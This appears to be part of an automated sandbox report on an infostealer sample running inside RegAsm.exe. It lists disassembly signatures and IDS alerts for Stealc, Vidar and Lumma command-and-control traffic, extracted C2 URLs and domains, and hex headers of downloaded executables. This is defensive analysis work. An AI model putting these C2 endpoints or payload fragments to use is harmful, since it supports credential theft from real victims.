Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	10_2_00449580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], dx	10_2_00422673
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	10_2_0044A610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	10_2_004296C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	10_2_004446C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], dx	10_2_0042268A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	10_2_00449690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	10_2_004276A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [ecx+esi+25h]	10_2_00408750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, edi	10_2_0042F700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then shrd esi, edx, 00000001h	10_2_00403710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	10_2_00431720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 77DD2217h	10_2_00420729
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then lea eax, dword ptr [ebp+04h]	10_2_004407E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	10_2_00449780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	10_2_0044A7A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [esp+24h], DEC6D8DEh	10_2_00430810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 3BABA5E0h	10_2_00444960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	10_2_00427900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah	10_2_0044A920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	10_2_00449A40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+0Ch]	10_2_0040DA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, edi	10_2_0042FAA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	10_2_00404B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh	10_2_00444B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp ecx	10_2_00413B7C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+18h]	10_2_0042DB00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [edi+eax]	10_2_0042DB00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp di, 005Ch	10_2_0041FB39
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+68h]	10_2_0041FB39
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	10_2_0043BBB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh	10_2_00448C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	10_2_00405C20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	10_2_00422C90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	10_2_00441D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	10_2_0041DD55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	10_2_00421DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], dx	10_2_00421DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	10_2_00414D8D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	10_2_0040DE20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	10_2_0042CEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov esi, eax	10_2_00431ED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edi, word ptr [esi]	10_2_00429EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	10_2_00421DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], dx	10_2_00421DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	10_2_00428FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	10_2_00428FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+000005A8h]	10_2_00420F8A

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.6:49721 -> 5.42.101.62:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 5.42.101.62:80 -> 192.168.2.6:49721
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 5.42.101.62:80 -> 192.168.2.6:49721
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49727 -> 46.8.231.109:80
Source: Network traffic	Suricata IDS: 2054495 - Severity 1 - ET MALWARE Vidar Stealer Form Exfil : 192.168.2.6:49728 -> 45.132.206.251:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.6:49727 -> 46.8.231.109:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 46.8.231.109:80 -> 192.168.2.6:49727
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.6:49727 -> 46.8.231.109:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 46.8.231.109:80 -> 192.168.2.6:49727
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.6:49727 -> 46.8.231.109:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 5.42.101.62:80 -> 192.168.2.6:49736
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 5.42.101.62:80 -> 192.168.2.6:49736
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 5.42.101.62:80 -> 192.168.2.6:49742
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 5.42.101.62:80 -> 192.168.2.6:49742
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49726 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49726 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49724 -> 104.21.1.169:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49724 -> 104.21.1.169:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49740 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49740 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49735 -> 172.67.205.129:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49735 -> 172.67.205.129:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49737 -> 172.67.205.129:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49737 -> 172.67.205.129:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49738 -> 104.21.1.169:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49738 -> 104.21.1.169:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://46.8.231.109/c4754d4f680ead72.php
Source: Malware configuration extractor	URLs: delaylacedmn.site
Source: Malware configuration extractor	URLs: possiwreeste.site
Source: Malware configuration extractor	URLs: writekdmsnu.site
Source: Malware configuration extractor	URLs: agentyanlark.site
Source: Malware configuration extractor	URLs: underlinemdsj.site
Source: Malware configuration extractor	URLs: commandejorsk.site
Source: Malware configuration extractor	URLs: famikyjdiag.site
Source: Malware configuration extractor	URLs: bellykmrebk.site
Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199780418869
Source: Malware configuration extractor	URLs: https://t.me/jamsemlg

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 30 Sep 2024 11:59:22 GMTContent-Type: application/octet-streamContent-Length: 2459136Last-Modified: Fri, 24 Nov 2023 13:43:06 GMTConnection: keep-aliveETag: "6560a86a-258600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 69 a8 60 65 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 25 00 d4 20 00 00 ca 04 00 00 00 00 00 7b 44 00 00 00 10 00 00 00 f0 20 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 25 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 db 23 00 f1 36 00 00 9c a2 24 00 28 00 00 00 00 d0 24 00 cc 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 24 00 88 e2 00 00 60 b2 23 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 b1 23 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 24 00 9c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 47 d3 20 00 00 10 00 00 00 d4 20 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 91 22 03 00 00 f0 20 00 00 24 03 00 00 d8 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 34 7c 00 00 00 20 24 00 00 62 00 00 00 fc 23 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b4 10 00 00 00 a0 24 00 00 12 00 00 00 5e 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 30 30 63 66 67 00 00 0e 01 00 00 00 c0 24 00 00 02 00 00 00 70 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 cc 12 00 00 00 d0 24 00 00 14 00 00 00 72 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 35 ff 00 00 00 f0 24 00 00 00 01 00 00 86 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 30 Sep 2024 11:59:26 GMTContent-Type: application/octet-streamContent-Length: 685392Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-a7550"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 30 Sep 2024 11:59:27 GMTContent-Type: application/octet-streamContent-Length: 608080Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-94750"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 30 Sep 2024 11:59:28 GMTContent-Type: application/octet-streamContent-Length: 450024Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-6dde8"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
